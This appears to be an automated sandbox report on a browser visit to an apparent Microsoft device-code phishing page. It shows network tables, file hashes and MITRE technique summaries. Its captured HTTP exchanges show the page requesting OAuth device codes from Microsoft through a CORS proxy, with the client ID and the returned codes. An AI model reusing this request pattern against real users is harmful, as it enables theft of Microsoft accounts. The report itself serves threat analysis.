	{ "brands": "unknown" }
URL: https://login.microsoftonline.com/common/oauth2/deviceauth Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Enter code to allow access", "prominent_button_name": "Next", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://login.microsoftonline.com/common/oauth2/deviceauth Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
Category:	downloaded
Size (bytes):	61052
Entropy (8bit):	7.996159932827634
Encrypted:	true
SSDEEP:	1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
MD5:	C1E82BF71ADD622AD0F3BF8572F634FC
SHA1:	6CA863D4CAB96669202548D301693B3F5F80B0D5
SHA-256:	BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
SHA-512:	820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Preview:	...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..\|.-..x1.F...@...yRlG.O..5.Q.\|.gy.c.^....r.EC.....xd.oL..$./..\|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1..lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.........W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 01:44:59.658437014 CET	49675	443	192.168.2.4	173.222.162.32
Jan 16, 2025 01:45:05.449404955 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:05.449460983 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:05.449554920 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:05.449796915 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:05.449820042 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:06.107459068 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:06.108076096 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:06.108134031 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:06.109298944 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:06.109385014 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:06.110717058 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:06.110790968 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:06.157557964 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:06.157589912 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:06.204253912 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:09.582938910 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:09.582958937 CET	443	49746	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:09.583061934 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:09.583719969 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:09.583730936 CET	443	49746	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.090197086 CET	443	49746	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.090590954 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.090614080 CET	443	49746	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.092308044 CET	443	49746	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.092402935 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.093455076 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.093496084 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.093540907 CET	443	49746	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.093602896 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.093614101 CET	443	49746	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.093627930 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.093667984 CET	49746	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.094119072 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.094156981 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.094244957 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.094450951 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.094465971 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.590154886 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.590465069 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.590480089 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.592144012 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.592231989 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.593338966 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.593430042 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.593636990 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:10.593647003 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:10.635479927 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:11.039762974 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:11.039891958 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:11.039953947 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:11.052470922 CET	49747	443	192.168.2.4	188.114.97.3
Jan 16, 2025 01:45:11.052500010 CET	443	49747	188.114.97.3	192.168.2.4
Jan 16, 2025 01:45:11.265753984 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.265774012 CET	443	49749	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.265832901 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.266154051 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.266171932 CET	443	49749	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.730284929 CET	443	49749	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.734947920 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.734975100 CET	443	49749	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.735853910 CET	443	49749	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.735925913 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.742396116 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.742463112 CET	443	49749	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.742547035 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.742563963 CET	443	49749	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.742702007 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.742728949 CET	443	49749	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.742746115 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.742770910 CET	49749	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.743402958 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.743438959 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.743495941 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.743807077 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:11.743820906 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:11.979255915 CET	49672	443	192.168.2.4	173.222.162.32
Jan 16, 2025 01:45:11.979299068 CET	443	49672	173.222.162.32	192.168.2.4
Jan 16, 2025 01:45:12.207604885 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:12.208576918 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:12.208591938 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:12.209556103 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:12.209615946 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:12.210180044 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:12.210239887 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:12.210671902 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:12.210680962 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:12.267060995 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:12.529908895 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:12.530004025 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:12.530154943 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:12.535265923 CET	49752	443	192.168.2.4	188.114.96.3
Jan 16, 2025 01:45:12.535290003 CET	443	49752	188.114.96.3	192.168.2.4
Jan 16, 2025 01:45:16.023897886 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:16.024043083 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:16.024128914 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:16.117575884 CET	49739	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:45:16.117599010 CET	443	49739	142.250.185.132	192.168.2.4
Jan 16, 2025 01:45:16.950861931 CET	49723	80	192.168.2.4	199.232.210.172
Jan 16, 2025 01:45:16.956057072 CET	80	49723	199.232.210.172	192.168.2.4
Jan 16, 2025 01:45:16.956155062 CET	49723	80	192.168.2.4	199.232.210.172
Jan 16, 2025 01:46:05.502862930 CET	49841	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:46:05.502912045 CET	443	49841	142.250.185.132	192.168.2.4
Jan 16, 2025 01:46:05.502971888 CET	49841	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:46:05.503354073 CET	49841	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:46:05.503366947 CET	443	49841	142.250.185.132	192.168.2.4
Jan 16, 2025 01:46:06.140139103 CET	443	49841	142.250.185.132	192.168.2.4
Jan 16, 2025 01:46:06.140558004 CET	49841	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:46:06.140590906 CET	443	49841	142.250.185.132	192.168.2.4
Jan 16, 2025 01:46:06.141683102 CET	443	49841	142.250.185.132	192.168.2.4
Jan 16, 2025 01:46:06.142107010 CET	49841	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:46:06.142281055 CET	443	49841	142.250.185.132	192.168.2.4
Jan 16, 2025 01:46:06.189291000 CET	49841	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:46:06.301002979 CET	49724	80	192.168.2.4	199.232.210.172
Jan 16, 2025 01:46:06.306205034 CET	80	49724	199.232.210.172	192.168.2.4
Jan 16, 2025 01:46:06.306344032 CET	49724	80	192.168.2.4	199.232.210.172
Jan 16, 2025 01:46:16.076488018 CET	443	49841	142.250.185.132	192.168.2.4
Jan 16, 2025 01:46:16.076555014 CET	443	49841	142.250.185.132	192.168.2.4
Jan 16, 2025 01:46:16.076694012 CET	49841	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:46:16.128300905 CET	49841	443	192.168.2.4	142.250.185.132
Jan 16, 2025 01:46:16.128320932 CET	443	49841	142.250.185.132	192.168.2.4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 01:45:01.312603951 CET	53	64945	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:01.835235119 CET	53	53764	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:02.808609962 CET	53	53942	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:05.441226006 CET	50257	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:05.441405058 CET	54267	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:05.448224068 CET	53	54267	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:05.448386908 CET	53	50257	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:07.198523045 CET	50210	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:07.198918104 CET	50420	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:07.240478992 CET	53	50420	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:08.309094906 CET	53	53180	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:09.566508055 CET	53	51820	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:09.570883036 CET	50883	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:09.571161032 CET	63655	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:09.579947948 CET	53	63655	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:09.582344055 CET	53	50883	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:11.110316038 CET	53	61752	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:11.194113016 CET	53	52536	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:11.243082047 CET	65306	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:11.243237019 CET	50366	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:11.251880884 CET	53	50366	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:11.252988100 CET	53	65306	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:11.493776083 CET	53	55180	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:14.007145882 CET	59912	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:14.007299900 CET	59615	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:15.147794962 CET	57440	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:15.147963047 CET	49289	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:45:16.868411064 CET	53	55444	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:17.869091988 CET	138	138	192.168.2.4	192.168.2.255
Jan 16, 2025 01:45:20.040386915 CET	53	50017	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:40.886495113 CET	53	52456	1.1.1.1	192.168.2.4
Jan 16, 2025 01:45:40.886794090 CET	53	64538	1.1.1.1	192.168.2.4
Jan 16, 2025 01:46:00.995812893 CET	53	52040	1.1.1.1	192.168.2.4
Jan 16, 2025 01:46:02.072338104 CET	53	58063	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
2025-01-16 00:45:10 UTC	756	OUT	GET /get?url=https%3A%2F%2Flogin.microsoftonline.com%2Fcommon%2Foauth2%2Fdevicecode%3Fapi-version%3D1.0%26client_id%3Dd3590ed6-52b3-4102-aeff-aad2292ab01c%26resource%3Dhttps%3A%2F%2Fgraph.windows.net HTTP/1.1 Host: api.allorigins.win Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://m3ins.azurewebsites.net Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 00:45:11 UTC	1168	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 00:45:10 GMT Content-Type: application/json Content-Length: 798 Connection: close Access-Control-Allow-Origin: https://m3ins.azurewebsites.net Cache-Control: public, max-age=300, stale-while-revalidate=86400 Via: allOrigins v3+ Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Content-Encoding, Accept Access-Control-Allow-Methods: OPTIONS, GET, POST, PATCH, PUT, DELETE X-Response-Time: 196.00ms cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RmtPZMfhbqNIZUMqw3vU3vvUh%2B%2BVmnpsKPmRsk24Yqjk%2BBEU0%2Bp%2FEtbMwHpcNJBmSlz0VJjH15KR6bbI2vOx3PSGJIl99jqoOckVxCN2RtU7De3lUQWyf%2Buswn0xMRS%2FajKxP8o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902a14cdd9f1ab5a-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14185&min_rtt=14184&rtt_var=5320&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1334&delivery_rate=205865&cwnd=32&unsent_bytes=0&cid=70efafba6f3a4bf7&ts=470&x=0"
2025-01-16 00:45:11 UTC	201	IN	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 73 22 3a 22 7b 5c 22 75 73 65 72 5f 63 6f 64 65 5c 22 3a 5c 22 45 39 43 4d 4c 34 57 36 4a 5c 22 2c 5c 22 64 65 76 69 63 65 5f 63 6f 64 65 5c 22 3a 5c 22 45 41 51 41 42 49 51 45 41 41 41 42 56 72 53 70 65 75 57 61 6d 52 61 6d 32 6a 41 46 31 58 52 51 45 70 77 57 4d 53 78 38 47 74 59 6a 74 6a 32 33 6e 58 46 74 72 4c 38 70 35 48 42 4b 4f 66 6a 33 64 78 76 63 61 43 50 54 76 54 7a 53 66 64 67 62 4b 59 53 4b 63 35 76 64 48 46 6a 5a 37 4a 6a 33 54 31 47 54 61 36 2d 48 65 63 62 53 63 6f 5a 6a 38 41 36 64 49 35 49 49 5a 4f 56 64 39 31 4f 79 63 76 78 54 53 51 35 41 42 53 4d 53 51 Data Ascii: {"contents":"{\"user_code\":\"E9CML4W6J\",\"device_code\":\"EAQABIQEAAABVrSpeuWamRam2jAF1XRQEpwWMSx8GtYjtj23nXFtrL8p5HBKOfj3dxvcaCPTvTzSfdgbKYSKc5vdHFjZ7Jj3T1GTa6-HecbScoZj8A6dI5IIZOVd91OycvxTSQ5ABSMSQ
2025-01-16 00:45:11 UTC	597	IN	Data Raw: 44 56 41 6f 6e 72 35 77 47 64 62 63 6f 4f 53 48 78 4a 33 6e 33 39 5f 57 5f 6f 4f 61 43 34 30 37 64 2d 33 6d 74 67 72 5f 73 75 42 77 48 58 67 4e 6c 64 42 34 75 6c 74 50 58 67 67 4b 7a 48 73 67 41 41 5c 22 2c 5c 22 76 65 72 69 66 69 63 61 74 69 6f 6e 5f 75 72 6c 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 64 65 76 69 63 65 6c 6f 67 69 6e 5c 22 2c 5c 22 65 78 70 69 72 65 73 5f 69 6e 5c 22 3a 5c 22 39 30 30 5c 22 2c 5c 22 69 6e 74 65 72 76 61 6c 5c 22 3a 5c 22 35 5c 22 2c 5c 22 6d 65 73 73 61 67 65 5c 22 3a 5c 22 54 6f 20 73 69 67 6e 20 69 6e 2c 20 75 73 65 20 61 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 6f 70 65 6e 20 74 68 65 20 70 61 67 65 20 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 64 65 Data Ascii: DVAonr5wGdbcoOSHxJ3n39_W_oOaC407d-3mtgr_suBwHXgNldB4ultPXggKzHsgAA\",\"verification_url\":\"https://microsoft.com/devicelogin\",\"expires_in\":\"900\",\"interval\":\"5\",\"message\":\"To sign in, use a web browser to open the page https://microsoft.com/de

Timestamp	Bytes transferred	Direction	Data
2025-01-16 00:45:12 UTC	536	OUT	GET /get?url=https%3A%2F%2Flogin.microsoftonline.com%2Fcommon%2Foauth2%2Fdevicecode%3Fapi-version%3D1.0%26client_id%3Dd3590ed6-52b3-4102-aeff-aad2292ab01c%26resource%3Dhttps%3A%2F%2Fgraph.windows.net HTTP/1.1 Host: api.allorigins.win Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 00:45:12 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 00:45:12 GMT Content-Type: application/json Content-Length: 798 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=300, stale-while-revalidate=86400 Via: allOrigins v3+ Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Content-Encoding, Accept Access-Control-Allow-Methods: OPTIONS, GET, POST, PATCH, PUT, DELETE X-Response-Time: 106.00ms cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=io6PkmDaAqNMGibZZAbHBFXqPaSofOZhFCrgSg5viFSELrOCba62tZlYi2qXB3hc%2BNRVtGC6GkuEQskZQdaP9kvKRleOJgXNDS%2FydSwVy2ts8ILIMCAe33TyACMP9fbAttHsgrQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902a14d7ff1458b4-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7066&min_rtt=7058&rtt_var=2662&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1114&delivery_rate=409997&cwnd=32&unsent_bytes=0&cid=ed13e5eae7f368c2&ts=327&x=0"
2025-01-16 00:45:12 UTC	243	IN	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 73 22 3a 22 7b 5c 22 75 73 65 72 5f 63 6f 64 65 5c 22 3a 5c 22 46 32 56 4e 45 52 4c 50 56 5c 22 2c 5c 22 64 65 76 69 63 65 5f 63 6f 64 65 5c 22 3a 5c 22 46 41 51 41 42 49 51 45 41 41 41 42 56 72 53 70 65 75 57 61 6d 52 61 6d 32 6a 41 46 31 58 52 51 45 38 55 6a 31 77 51 43 78 57 4e 44 46 30 76 47 33 58 70 46 68 62 77 45 34 58 73 4c 6f 77 5f 31 73 59 41 30 74 74 51 4a 4e 6e 37 77 71 61 75 70 72 76 77 63 50 72 6b 44 67 67 58 48 43 69 36 66 50 71 4f 58 51 36 44 72 73 4c 56 58 54 70 78 66 75 72 78 45 55 64 5f 63 41 45 49 45 38 4f 78 74 55 45 69 53 37 56 71 51 43 4f 4a 4e 6e 6a 71 34 6c 31 75 53 4e 43 76 42 4e 4a 31 52 5a 43 36 5a 56 44 53 31 66 67 77 4a 55 50 41 6e 4a 68 62 73 70 5f 49 58 6e 69 65 Data Ascii: {"contents":"{\"user_code\":\"F2VNERLPV\",\"device_code\":\"FAQABIQEAAABVrSpeuWamRam2jAF1XRQE8Uj1wQCxWNDF0vG3XpFhbwE4XsLow_1sYA0ttQJNn7wqauprvwcPrkDggXHCi6fPqOXQ6DrsLVXTpxfurxEUd_cAEIE8OxtUEiS7VqQCOJNnjq4l1uSNCvBNJ1RZC6ZVDS1fgwJUPAnJhbsp_IXnie
2025-01-16 00:45:12 UTC	555	IN	Data Raw: 5a 46 69 73 6e 50 5f 71 4f 57 4c 6f 63 5f 66 35 48 76 79 4e 4d 67 41 41 5c 22 2c 5c 22 76 65 72 69 66 69 63 61 74 69 6f 6e 5f 75 72 6c 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 64 65 76 69 63 65 6c 6f 67 69 6e 5c 22 2c 5c 22 65 78 70 69 72 65 73 5f 69 6e 5c 22 3a 5c 22 39 30 30 5c 22 2c 5c 22 69 6e 74 65 72 76 61 6c 5c 22 3a 5c 22 35 5c 22 2c 5c 22 6d 65 73 73 61 67 65 5c 22 3a 5c 22 54 6f 20 73 69 67 6e 20 69 6e 2c 20 75 73 65 20 61 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 6f 70 65 6e 20 74 68 65 20 70 61 67 65 20 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 64 65 76 69 63 65 6c 6f 67 69 6e 20 61 6e 64 20 65 6e 74 65 72 20 74 68 65 20 63 6f 64 65 20 46 32 56 4e 45 52 4c 50 56 20 74 6f 20 Data Ascii: ZFisnP_qOWLoc_f5HvyNMgAA\",\"verification_url\":\"https://microsoft.com/devicelogin\",\"expires_in\":\"900\",\"interval\":\"5\",\"message\":\"To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code F2VNERLPV to

Target ID:	0
Start time:	19:44:54
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	19:44:59
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2232,i,3775122873185962186,10663787644327668169,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	3
Start time:	19:45:05
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
